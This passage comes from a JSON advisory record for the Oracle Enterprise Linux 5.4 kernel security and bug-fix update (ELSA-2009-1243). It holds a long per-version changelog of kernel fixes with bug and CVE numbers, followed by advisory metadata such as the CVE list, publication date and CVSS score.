avoid redundant context mapping (ddugger@redhat.com ) [484227]\n- [xen] x86: fix EPT for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: add domctl interfaces for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: memory changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] x86: intercept I/O for assigned device (ddugger@redhat.com ) [484227]\n- [xen] x86: IRQ injection changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] add VT-d specific files (ddugger@redhat.com ) [484227]\n- [xen] some system changes for VT-d (ddugger@redhat.com ) [484227]\n- [xen] add VT-d public header files (ddugger@redhat.com ) [484227]\n- [xen] ia64: add pci definitions and access functions (ddugger@redhat.com ) [484227]\n[2.6.18-138.el5]\n- [nfs] remove bogus lock-if-signalled case (Bryn M. Reeves ) [456288]\n- [gfs2] fix uninterruptible quotad sleeping (Steven Whitehouse ) [492943]\n- [net] iptables NAT port randomisation (Thomas Graf ) [459943]\n- [gfs2] tar off gfs2 broken - truncated symbolic links (Steven Whitehouse ) [492911]\n- [net] skip redirect msg if target addr is not link-local (Thomas Graf ) [481209]\n- [scsi] lpfc: remove duplicate pci* functions from driver (Prarit Bhargava ) [442007]\n- [net] igb: make driver ioport free (Prarit Bhargava ) [442007]\n- [net] e1000: make driver ioport free (Prarit Bhargava ) [442007]\n- [net] e1000e: make driver ioport free (Prarit Bhargava ) [442007]\n- [pci] add pci*_selected_region/pci_enable_device_io|mem (Prarit Bhargava ) [442007]\n- [x86] NONSTOP_TSC in tsc clocksource (Luming Yu ) [474091]\n- [ppc] keyboard not recognized on bare metal (Justin Payne ) [455232]\n- [fs] writeback: fix persistent inode->dirtied_when val (Jeff Layton ) [489359]\n- [fs] xfs: misc upstream fixes (Eric Sandeen ) [470845]\n- [fs] xfs: fix compat ioctls (Eric Sandeen ) [470845]\n- [fs] xfs: new aops interface (Eric Sandeen ) [470845]\n- [fs] xfs: backport to rhel5.4 kernel (Eric Sandeen ) [470845]\n- [fs] xfs: update to 2.6.28.6 codebase (Eric Sandeen ) [470845]\n- [fs] d_obtain_alias helper (Eric Sandeen ) [470845]\n- [fs] d_add_ci helper (Eric Sandeen ) [470845]\n- [misc] completion helpers (Eric Sandeen ) [470845]\n- [fs] block_page_mkwrite helper (Eric Sandeen ) [470845]\n- [mm] generic_segment_checks helper (Eric Sandeen ) [470845]\n- [i2c] add support for SB800 SMBus (Bhavna Sarathy ) [488746]\n- [i2c] i2c-piix4: support for the Broadcom HT1100 chipset (Flavio Leitner ) [474240]\n- [s390] hvc_iucv: z/VM IUCV hypervisor console support (Hans-Joachim Picht ) [475551]\n- [s390] hvc_console: upgrade version of hvc_console (Hans-Joachim Picht ) [475551]\n- [s390] iucv: locking free version of iucv_message_ (Hans-Joachim Picht ) [475551]\n- [s390] set default preferred console device 'ttyS' (Hans-Joachim Picht ) [475551]\n- [s390] kernel: shutdown action 'dump_reipl' (Hans-Joachim Picht ) [474688]\n- [s390] splice: handle try_to_release_page failure (Hans-Joachim Picht ) [475334]\n- [s390] blktrace: add ioctls to SCSI generic devices (Hans-Joachim Picht ) [475334]\n- [s390] add FCP performance data collection (Hans-Joachim Picht ) [475334]\n- [s390] extra kernel parameters via VMPARM (Hans-Joachim Picht ) [475530]\n- [s390] kernel: extra kernel parameters via VMPARM (Hans-Joachim Picht ) [475530]\n- [s390] z90crypt: add ap adapter interrupt support (Hans-Joachim Picht ) [474700]\n- [s390] add Call Home data (Hans-Joachim Picht ) [475820]\n- [s390] kernel: processor degredation support (Hans-Joachim Picht ) [475820]\n- [s390] kernel: Shutdown Actions Interface (Hans-Joachim Picht ) [475563]\n- [s390] provide service levels of HW & Hypervisor (Hans-Joachim Picht ) [475570]\n- [s390] qeth: ipv6 support for hiper socket layer 3 (Hans-Joachim Picht ) [475572]\n- [s390] kernel: NSS Support (Hans-Joachim Picht ) [474646]\n- [acpi] donot evaluate _PPC until _PSS has been evaluated (Matthew Garrett ) [469105]\n- [net] iwlwifi: enable LEDS Kconfig options (John W. Linville ) [486030]\n- [spec] devel pkg: own the directories they write too (Don Zickus ) [481808]\n- [crypto] bugfixes to ansi_cprng for fips compliance (Neil Horman ) [481175 469437]\n- [scsi] qla2xxx: production FCoE firmware (Marcus Barrow ) [471900]\n- [scsi] qla2xxx: production FCoE support (Marcus Barrow ) [471900]\n- [fs] add compat_sys_ustat (Eric Sandeen ) [472426]\n- [x86_64] panic if AMD cpu_khz is wrong (Prarit Bhargava ) [472523]\n- [x86] fix calls to pci_scan_bus (Prarit Bhargava ) [470202]\n[2.6.18-137.el5]\n- [fs] HFS: mount memory leak (Dave Anderson ) [488048]\n- [docs] document netdev_budget (Stanislaw Gruszka ) [463249]\n- [net] netfilter: nfmark IPV6 routing in OUTPUT (Anton Arapov ) [470059]\n- [gfs2] use ->page_mkwrite for mmap() (Benjamin Marzinski ) [315191]\n- [fs] ecryptfs: fix memory leak into crypto headers (Eric Sandeen ) [491256]\n- [x86] add nonstop_tsc flag in /proc/cpuinfo (Luming Yu ) [474091]\n- [alsa] HDA: update for RHEL-5.4 (Jaroslav Kysela ) [483594]\n- [fs] autofs4: fix lookup deadlock (Ian Kent ) [490078]\n- [fs] autofs4: make autofs type usage explicit (Ian Kent ) [452120]\n- [fs] autofs4: add miscelaneous device for ioctls (Ian Kent ) [452120]\n- [fs] autofs4: devicer node ioctl docoumentation (Ian Kent ) [452120]\n- [fs] autofs4: track uid and gid of last mount requester (Ian Kent ) [452120]\n- [nfs] memory corruption in nfs3_xdr_setaclargs (Sachin S. Prabhu ) [479432]\n- [misc] cpuset: attach_task fixes (KII Keiichi ) [471634]\n- [s390] dasd: fix race in dasd timer handling (Hans-Joachim Picht ) [490128]\n- [x86] use [ml]fence to synchronize rdtsc (Chris Lalancette ) [448588]\n- [xen] silence MMCONFIG warnings (Chris Lalancette ) [462572]\n- [xen] fix occasional deadlocks in Xen netfront (Chris Lalancette ) [480939]\n- [xen] fix crash when modprobe xen-vnif in a KVM guest (Chris Lalancette ) [487691]\n- [xen] xen reports bogus LowTotal (Chris Lalancette ) [428892]\n- [xen] wait 5 minutes for device connection (Chris Lalancette ) [396621]\n- [xen] only recover connected devices on resume (Chris Lalancette ) [396621]\n- [xen] ia64: fix bad mpa messages (Chris Lalancette ) [288511]\n- [net] handle non-linear packets in skb_checksum_setup (Herbert Xu ) [477012]\n- [fs] fix __page_symlink to be kabi friendly (Josef Bacik ) [445433]\n- [fs] ext3: convert to new aops (Josef Bacik ) [445433]\n- [mm] make new aops kABI friendly (Josef Bacik ) [445433]\n- [fs] fix symlink allocation context (Josef Bacik ) [445433]\n- [mm] iov_iter_advance fix, dont go off the end (Josef Bacik ) [445433]\n- [mm] fix infinite loop with iov_iter_advance (Josef Bacik ) [445433]\n- [mm] restore the KERNEL_DS optimisations (Josef Bacik ) [445433]\n- [gfs2] remove generic aops stuff (Josef Bacik ) [445433]\n- [fs] new cont helpers (Josef Bacik ) [445433]\n- [mm] introduce new aops, write_begin and write_end (Josef Bacik ) [445433]\n- [fs] splice: dont do readpage (Josef Bacik ) [445433]\n- [fs] splice: dont steal pages (Josef Bacik ) [445433]\n- [gfs2] remove static iov iter stuff (Josef Bacik ) [445433]\n- [mm] iov_iter helper functions (Josef Bacik ) [445433]\n- [mm] fix pagecache write deadlocks (Josef Bacik ) [445433]\n- [mm] write iovec cleanup (Josef Bacik ) [445433]\n- [mm] fix other users of __grab_cache_page (Josef Bacik ) [445433]\n- [mm] cleanup page caching stuff (Josef Bacik ) [445433]\n- [mm] cleanup error handling (Josef Bacik ) [445433]\n- [mm] clean up buffered write code (Josef Bacik ) [445433]\n- [mm] revert deadlock on vectored write fix (Josef Bacik ) [445433]\n- [mm] kill the zero-length iovec segments handling (Josef Bacik ) [445433]\n- [mm] revert KERNEL_DS buffered write optimisation (Josef Bacik ) [445433]\n- [mm] clean up pagecache allocation (Josef Bacik ) [445433]\n- [x86] move pci_video_fixup to later in boot (Prarit Bhargava ) [467785]\n- [usb] net: dm9601: upstream fixes for 5.4 (Ivan Vecera ) [471800]\n- [xen] ia64: fix FP emulation in a PV domain (Chris Lalancette ) [477098]\n- [xen] ia64: make sure guest pages dont change (Chris Lalancette ) [477098]\n- [xen] improve handle_fpu_swa (Chris Lalancette ) [477098]\n- [xen] ia64: fix windows 2003 BSOD (Chris Lalancette ) [479923]\n- [xen] x86: fix dom0 panic when using dom0_max_vcpus (Chris Lalancette ) [485119]\n- [xen] x86: silence WRMSR warnings (Chris Lalancette ) [470035]\n[2.6.18-136.el5]\n- Revert: [x86_64] fix gettimeoday TSC overflow issue (Prarit Bhargava ) [467942]\n- [ptrace] audit_syscall_entry to use right syscall number (Jiri Pirko ) [488002] {CVE-2009-0834}\n- [md] dm: check log bitmap will fit within the log device (Milan Broz ) [471565]\n- [nfs] add 'lookupcache' mount option for nfs shares (Sachin S. Prabhu ) [489285]\n- [nfs] add fine grain control for lookup cache in nfs (Sachin S. Prabhu ) [489285]\n- [net] tulip: MTU problems with 802.1q tagged frames (Ivan Vecera ) [484796]\n- [net] rtnetlink: fix sending message when replace route (Jiri Pirko ) [462725]\n- [s390] sclp: handle zero-length event buffers (Hans-Joachim Picht ) [487695]\n- [s390] dasd: DASDFMT not operating like CPFMTXA (Hans-Joachim Picht ) [484836]\n- [xen] fix blkfront bug with overflowing ring (Chris Lalancette ) [460693]\n- [net] ipv6: disallow IPPROTO_IPV6-level IPV6_CHECKSUM (Jiri Pirko ) [486204]\n- [ide] fix interrupt flood at startup w/ESB2 (James Paradis ) [438979]\n- [s390] cio: Properly disable not operational subchannel (Hans-Joachim Picht ) [487701]\n- [misc] kernel-headers: add serial_reg.h (Don Zickus ) [463538]\n[2.6.18-135.el5]\n- [s390] iucv: failing cpu hot remove for inactive iucv (Hans-Joachim Picht ) [485412]\n- [s390] dasd: fix waitqueue for sleep_on_immediatly (Hans-Joachim Picht ) [480161]\n- [ide] increase timeouts in wait_drive_not_busy (Stanislaw Gruszka ) [464039]\n- [x86_64] mce: do not clear an unrecoverable error status (Aristeu Rozanski ) [489692]\n- [wireless] iwlwifi: booting with RF-kill switch enabled (John W. Linville ) [482990]\n- [net] put_cmsg: may cause application memory overflow (Jiri Pirko ) [488367]\n- [x86_64] fix gettimeoday TSC overflow issue (Prarit Bhargava ) [467942]\n- [net] ipv6: check hop limit setting in ancillary data (Jiri Pirko ) [487406]\n- [net] ipv6: check outgoing interface in all cases (Jiri Pirko ) [486215]\n- [acpi] disable GPEs at the start of resume (Matthew Garrett ) [456302]\n- [crypto] include crypto headers in kernel-devel (Neil Horman ) [470929]\n- [net] netxen: rebase for RHEL-5.4 (tcamuso@redhat.com ) [485381]\n- [misc] signal: modify locking to handle large loads (AMEET M. PARANJAPE ) [487376]\n- [kexec] add ability to dump log from vmcore file (Neil Horman ) [485308]\n- [fs] ext3: handle collisions in htree dirs (Eric Sandeen ) [465626]\n- [acpi] use vmalloc in acpi_system_read_dsdt (Prarit Bhargava ) [480142]\n- [misc] make ioctl.h compatible with userland (Jiri Pirko ) [473947]\n- [nfs] sunrpc: add sv_maxconn field to svc_serv (Jeff Layton ) [468092]\n- [nfs] lockd: set svc_serv->sv_maxconn to a better value (Jeff Layton ) [468092]\n- [mm] decrement reclaim_in_progress after an OOM kill (Larry Woodman ) [488955]\n- [misc] sysrq-t: display backtrace for runnable processes (Anton Arapov ) [456588]\n[2.6.18-134.el5]\n- [dlm] fix length calculation in compat code (David Teigland ) [487672]\n- [net] ehea: remove adapter from list in error path (AMEET M. PARANJAPE ) [488254]\n- [x86] reserve low 64k of memory to avoid BIOS corruption (Matthew Garrett ) [471851]\n- [nfs] fix hung clients from deadlock in flush_workqueue (David Jeffery ) [483627]\n- [net] fix a few udp counters (Neil Horman ) [483266]\n- [ia64] use current_kernel_time/xtime in hrtimer_start() (Prarit Bhargava ) [485323]\n- [sata] libata: ahci withdraw IGN_SERR_INTERNAL for SB800 (David Milburn ) [474301]\n- [ata] libata: iterate padded atapi scatterlist (David Milburn ) [446086]\n- [x86] TSC keeps running in C3+ (Luming Yu ) [474091]\n- [acpi] fix C-states less efficient on certain machines (Luming Yu ) [484174]\n- [net] ipv6: fix getsockopt for sticky options (Jiri Pirko ) [484105 483790]\n- [ppc64] cell spufs: update to the upstream for RHEL-5.4 (AMEET M. PARANJAPE ) [475620]\n- [ppc64] cell: fix npc setting for NOSCHED contexts (AMEET M. PARANJAPE ) [467344]\n- [ppc64] handle null iommu dma-window property correctly (AMEET M. PARANJAPE ) [393241]\n- [net] e1000, bnx2: enable entropy generation (Ivan Vecera ) [439898]\n- Revert: [xen] console: make LUKS passphrase readable (Bill Burns ) [475986]\n- [gfs2] add UUID to gfs2 super block (Steven Whitehouse ) [242696]\n- [x86] consistent time options for x86_64 and i386 (Prarit Bhargava ) [475374]\n- [xen] allow > 4GB EPT guests on i386 (Chris Lalancette ) [478522]\n- [xen] clear screen to make LUKS passphrase visible (Bill Burns ) [475986]\n[2.6.18-133.el5]\n- [net] fix oops when using openswan (Neil Horman ) [484590]\n- [net] bonding: fix arp_validate=3 slaves behaviour (Jiri Pirko ) [484304]\n- [serial] 8250: fix boot hang when using with SOL port (Mauro Carvalho Chehab ) [467124]\n- [usb] sb600/sb700: workaround for hang (Pete Zaitcev ) [471972]\n- [gfs2] make quota mount option consistent with gfs (Bob Peterson ) [486168]\n- [xen] pv-block: remove anaconda workaround (Don Dutile ) [477005]\n- [ppc64] power7: fix /proc/cpuinfo cpus info (AMEET M. PARANJAPE ) [486649]\n- [net] skfp_ioctl inverted logic flaw (Eugene Teo ) [486540] {CVE-2009-0675}\n- [net] memory disclosure in SO_BSDCOMPAT gsopt (Eugene Teo ) [486518] {CVE-2009-0676}\n- [net] enic: upstream update to version 1.0.0.933 (Andy Gospodarek ) [484824]\n- [mm] cow vs gup race fix (Andrea Arcangeli ) [471613]\n- [mm] fork vs gup race fix (Andrea Arcangeli ) [471613]\n- [gfs2] parsing of remount arguments incorrect (Bob Peterson ) [479401]\n- [ppc64] eeh: disable/enable LSI interrupts (AMEET M. PARANJAPE ) [475696]\n- [x86] limit max_cstate to use TSC on some platforms (Tony Camuso ) [470572]\n- [ptrace] correctly handle ptrace_update return value (Jerome Marchand ) [483814]\n- [dlm] fix plock notify callback to lockd (David Teigland ) [470074]\n- [input] wacom: 12x12 problem while using lens cursor (Aristeu Rozanski ) [484959]\n- [wireless] ath5k: update to F10 version (Michal Schmidt ) [479049]\n- [xen] disable suspend in kernel (Justin M. Forbes ) [430928]\n- [net] ipv6: update setsockopt to support RFC 3493 (Jiri Pirko ) [484971]\n- [net] ipv6: check length of userss optval in setsockopt (Jiri Pirko ) [484977]\n- [scsi] handle work queue and shost_data setup failures (mchristi@redhat.com ) [450862]\n- [net] skbuff: fix oops in skb_seq_read (mchristi@redhat.com ) [483285]\n- [net] sky2: update driver for RHEL-5.4 (Neil Horman ) [484712]\n- [net] ipv6: Hop-by-Hop options header returned bad value (Jiri Pirko ) [483793]\n- [pci] fix MSI descriptor leak during hot-unplug (James Paradis ) [484943]\n- [net] improve udp port randomization (Vitaly Mayatskikh ) [480951]\n- [misc] ia64, s390: add kernel version to panic output (Prarit Bhargava ) [484403]\n- [x86-64] fix int db_5.RHSA-2009-1243x80 -ENOSYS return (Vitaly Mayatskikh ) [481682]\n- [net] dont add NAT extension for confirmed conntracks (Herbert Xu ) [481076]\n- [xen] fbfront dirty race (Markus Armbruster ) [456893]\n- [net] ehea: improve behaviour in low mem conditions (AMEET M. PARANJAPE ) [483148]\n- [net] fix icmp_send and icmpv6_send host re-lookup code (Jiri Pirko ) [439670]\n- [scsi] ibmvscsi: N-Port-ID support on ppc64 (AMEET M. PARANJAPE ) [474701]\n- [xen] guest crash when host has >= 64G RAM (Rik van Riel ) [448115]\n- [ppc] cell: add support for power button on blades (AMEET M. PARANJAPE ) [475658]\n- [ppc64] serial_core: define FIXED_PORT flag (AMEET M. PARANJAPE ) [475621]\n- [s390] cio: I/O error after cable pulls 2 (Hans-Joachim Picht ) [479878]\n- [misc] ptrace, utrace: fix blocked signal injection (Jerome Marchand ) [451849]\n- [xen] irq: remove superfluous printk (Rik van Riel ) [456095]\n- [s390] qeth: print HiperSocket version on z9 and later (Hans-Joachim Picht ) [479881]\n- [s390] qeth: crash in case of layer mismatch for VSWITCH (Hans-Joachim Picht ) [476205]\n- [s390] qdio: only 1 buffer in INPUT_PROCESSING state (Hans-Joachim Picht ) [479867]\n- [s390] disable cpu topology support by default (Hans-Joachim Picht ) [475797]\n- [s390] qeth: unnecessary support ckeck in sysfs route6 (Hans-Joachim Picht ) [474469]\n- [s390] cio: ccwgroup online vs. ungroup race condition (Hans-Joachim Picht ) [479879]\n- [s390] dasd: dasd_device_from_cdev called from interrupt (Hans-Joachim Picht ) [474806]\n- [misc] minor signal handling vulnerability (Oleg Nesterov ) [479964] {CVE-2009-0028}\n[2.6.18-132.el5]\n- [firmware] dell_rbu: prevent oops (Don Howard ) [482942]\n- [fs] lockd: improve locking when exiting from a process (Peter Staubach ) [448929]\n- [misc] backport RUSAGE_THREAD support (Jerome Marchand ) [451063]\n- [gfs2] panic in debugfs_remove when unmounting (Abhijith Das ) [483617]\n- [nfs] memory corruption in nfs3_xdr_setaclargs (Sachin S. Prabhu ) [479432]\n- [nfs] fix hangs during heavy write workloads (Peter Staubach ) [469848]\n- [pci] msi: set 'En' bit for devices on HT-based platform (Andy Gospodarek ) [290701]\n- [net] ipt_REJECT: properly handle IP options (Ivan Vecera ) [473504]\n- [ppc] cell: fix GDB watchpoints (AMEET M. PARANJAPE ) [480239]\n- [edac] add i5400 driver (Mauro Carvalho Chehab ) [462895]\n- [xen] fix disappearing PCI devices from PV guests (Bill Burns ) [233801]\n- [net] s2io: flush statistics when changing the MTU (AMEET M. PARANJAPE ) [459514]\n- [scsi] no-sense msgs, data corruption, but no i/o errors (Rob Evers ) [468088]\n- [powerpc] wait for a panic_timeout > 0 before reboot (AMEET M. PARANJAPE ) [446120]\n- [ppc64] cell: axon-msi: Retry on missing interrupt (AMEET M. PARANJAPE ) [472405]\n- [ppc] MSI interrupts are unreliable on IBM QS21 and QS22 (AMEET M. PARANJAPE ) [472405]\n- [crypto] des3_ede: permit weak keys unless REQ_WEAK_KEY (Jarod Wilson ) [474394]\n- [ata] JMB361 only has one port (Prarit Bhargava ) [476206]\n- [net] r8169: disable the ability to change MAC address (Ivan Vecera ) [475867]\n- [misc] futex.h: remove kernel bits for userspace header (Anton Arapov ) [475790]\n- [fs] inotify: send IN_ATTRIB event on link count changes (Eric Paris ) [471893]\n- [misc] ppc64: large sends fail with unix domain sockets (Larry Woodman ) [461312]\n- [audit] misc kernel fixups (Alexander Viro ) [475330]\n- [audit] records for descr created by pipe and socketpair (Alexander Viro ) [475278]\n- [audit] control character detection is off-by-one (Alexander Viro ) [475150]\n- [audit] fix kstrdup error check (Alexander Viro ) [475149]\n- [audit] assorted audit_filter_task panics on ctx == NULL (Alexander Viro ) [475147]\n- [audit] increase AUDIT_MAX_KEY_LEN (Alexander Viro ) [475145]\n- [nfs] race with nfs_access_cache_shrinker() and umount (Peter Staubach ) [469225]\n- [nfs] lockd: handle long grace periods correctly (Peter Staubach ) [474590]\n- [crypto] ansi_cprng: fix inverted DT increment routine (Jarod Wilson ) [471281]\n- [crypto] ansi_cprng: extra call to _get_more_prng_bytes (Jarod Wilson ) [471281]\n- [fs] proc: Proportional Set Size calculation and display (Larry Woodman ) [471969]\n- [video] avoid writing outside shadow.bytes array (Mauro Carvalho Chehab ) [471844]\n- [fs] need locking when reading /proc/\n/oom_score (Larry Woodman ) [470459]\n- [x86] memmap=X does not yield new map (Prarit Bhargava ) [464500]\n- [s390] qeth: avoid problems after failing recovery (Hans-Joachim Picht ) [468019]\n- [s390] qeth: avoid skb_under_panic for bad inbound data (Hans-Joachim Picht ) [468075]\n- [s390] sclp: incorrect softirq disable/enable (Hans-Joachim Picht ) [468021]\n- [crypto] export DSA_verify as a gpl symbol (Jarod Wilson ) [470111]\n- [s390] lcs: output request completion with zero cpa val (Hans-Joachim Picht ) [463165]\n- [s390] dasd: oops when Hyper PAV alias is set online (Hans-Joachim Picht ) [458155]\n- [s390] ipl: file boot then boot from alt dev wont work (Hans-Joachim Picht ) [458115]\n- [s390] zfcp: remove messages flooding the kernel log (Hans-Joachim Picht ) [455260]\n- [snd] fix snd-sb16.ko compile (Prarit Bhargava ) [456698]\n[2.6.18-131.el5]\n- [scsi] libata: sas_ata fixup sas_sata_ops (David Milburn ) [483171]\n- [fs] ecryptfs: readlink flaw (Eric Sandeen ) [481607] {CVE-2009-0269}\n- [crypto] ccm: fix handling of null assoc data (Jarod Wilson ) [481031]\n- [misc] fix leap second hang (Prarit Bhargava ) [479765]\n- [qla2xxx] correct endianness during flash manipulation (Marcus Barrow ) [481691]\n- [net] gso: ensure that the packet is long enough (Jiri Pirko ) [479927]\n- [audit] remove bogus newlines in EXECVE audit records (Jiri Pirko ) [479412]\n- [ppc] dont reset affinity for secondary MPIC on boot (AMEET M. PARANJAPE ) [480801]\n- [nfs] knfsd: alloc readahead cache in individual chunks (Jeff Layton ) [459397]\n- [nfs] knfsd: read-ahead cache, export table corruption (Jeff Layton ) [459397]\n- [nfs] knfsd: replace kmalloc/memset with kcalloc (Jeff Layton ) [459397]\n- [nfs] knfsd: make readahead params cache SMP-friendly (Jeff Layton ) [459397]\n- [crypto] fix sha384 blocksize definition (Neil Horman ) [469167]\n[2.6.18-130.el5]\n- [security] keys: introduce missing kfree (Jiri Pirko ) [480598] {CVE-2009-0031}\n- [net] ixgbe: frame reception and ring parameter issues (Andy Gospodarek ) [475625]\n- [net] tcp-lp: prevent chance for oops (Ivan Vecera ) [478638]\n- [misc] fix memory leak during pipe failure (Benjamin Marzinski ) [478643]\n- [block] enforce a minimum SG_IO timeout (Eugene Teo ) [475406] {CVE-2008-5700}\n- [x86] pci domain: re-enable support on blacklisted boxes (Prarit Bhargava ) [474891]\n- [fs] link_path_walk sanity, stack usage optimization (Anton Arapov ) [470139]\n- [x86_64] incorrect cpu_khz calculation for AMD processor (Prarit Bhargava ) [467782]\n- [crypto] fips: panic kernel if we fail crypto self tests (Neil Horman ) [462909]\n- [genkey] increase signing key length to 1024 bits (Neil Horman ) [413241]\n- [x86] kdump: lockup when crashing with console_sem held (Neil Horman ) [456934]\n- [fs] ext[234]: directory corruption DoS (Eugene Teo ) [459604] {CVE-2008-3528}\n[2.6.18-129.el5]\n- [gfs2] mount attempt hangs if no more journals available (Bob Peterson ) [475312]\n- [sched] fix clock_gettime monotonicity (Peter Zijlstra ) [477763]\n- [nfs] create rpc clients with proper auth flavor (Jeff Layton ) [465456]\n- [nfs] handle attribute timeout and u32 jiffies wrap (Jeff Layton ) [460133]\n- [net] deadlock in Hierarchical token bucket scheduler (Neil Horman ) [474797]\n- [net] sctp: overflow with bad stream ID in FWD-TSN chunk (Eugene Teo ) [478805] {CVE-2009-0065}\n- [md] fix oops with device-mapper mirror target (Heinz Mauelshagen ) [472558]\n- [openib] restore traffic in connected mode on HCA (AMEET M. PARANJAPE ) [477000]\n- [net] add preemption point in qdisc_run (Jiri Pirko ) [471398] {CVE-2008-5713}\n- [wireless] iwl: fix BUG_ON in driver (Neil Horman ) [477671]\n- [x86_64] copy_user_c assembler can leave garbage in rsi (Larry Woodman ) [456682]\n- [misc] setpgid returns ESRCH in some situations (Oleg Nesterov ) [472433]\n- [s390] zfcp: fix hexdump data in s390dbf traces (Hans-Joachim Picht ) [470618]\n- [fs] hfsplus: fix buffer overflow with a corrupted image (Anton Arapov ) [469638] {CVE-2008-4933}\n- [fs] hfsplus: check read_mapping_page return value (Anton Arapov ) [469645] {CVE-2008-4934}\n- [fs] hfs: fix namelength memory corruption (Anton Arapov ) [470773] {CVE-2008-5025}\n- [net] netlink: fix overrun in attribute iteration (Eugene Teo ) [462283]", "cvss3": {}, "published": "2009-09-08T00:00:00", "type": "oraclelinux", "title": "Oracle Enterprise Linux 5.4 kernel security and bug fix update", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2009-2692", "CVE-2009-1385", "CVE-2008-5700", "CVE-2008-3528", "CVE-2008-5713", "CVE-2009-0675", "CVE-2009-0747", "CVE-2009-0746", "CVE-2009-2698", "CVE-2009-0028", "CVE-2009-1072", "CVE-2009-0676", "CVE-2009-1192", "CVE-2008-5025", "CVE-2009-0065", "CVE-2009-0745", "CVE-2009-2407", "CVE-2008-4933", "CVE-2009-1337", "CVE-2007-5966", "CVE-2009-1388", "CVE-2009-0269", "CVE-2009-1389", "CVE-2009-0834", "CVE-2009-1633", "CVE-2009-0748", "CVE-2009-0031", "CVE-2009-2406", "CVE-2009-1439", "CVE-2009-2848", "CVE-2009-1897", "CVE-2007-3719", "CVE-2008-4934", "CVE-2009-1630", "CVE-2009-2847"], "modified": "2009-09-08T00:00:00", "id": "ELSA-2009-1243", "href": "http://linux.oracle.com/errata/ELSA-2009-1243.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}
CVE-2009-1897
